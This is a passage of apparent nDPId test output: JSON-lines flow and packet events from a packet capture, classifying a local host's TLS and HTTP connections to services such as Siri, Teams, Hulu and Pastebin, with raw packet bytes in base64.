AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.GoogleCloud","breed":"Acceptable","category":"Cloud"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Bloomberg","breed":"Acceptable","category":"Network"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495650748,"flow_last_seen":1646495650748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495650748,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1646495650748,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495650748,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GIFAAEAGaR3AqAGANHHChOIWAbvSHIRRAAAAAKAC+vCUIQAAAgQFtAQCCApnoF3vAAAAAAEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1646495650768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495650768,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0H0NAAHQGLmM0ccKEwKgBgAG74hatJvO00hyEUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} -01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1646495650768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495650768,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItGINAAEAGZyrAqAGANHHChOIWAbvSHIRSrSbztVAYAfbGZQAAFgMBAgABAAH8AwO6eoC9IxGTkdV9vVeJGWk4znzi7kZuVq2WW+Nl\/2Sg0SCU+jy21h8ySE7r\/PfMeW\/+6AejiqSkX1JQLDj\/qy1dewAgSkoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTCgoAAAAAABUAEwAAEHRlYW1zLm9mZmljZS5jb20AFwAA\/wEAAQAACgAKAAjKygAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKcrKAAEAAB0AIP361tTnT+5yNMG5uzlpGoadVy4F1\/ksgWxYfkq0hvgPAC0AAgEBACsABwYaGgMEAwMAGwADAgACRGkABQADAmgyWloAAQAAFQDHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 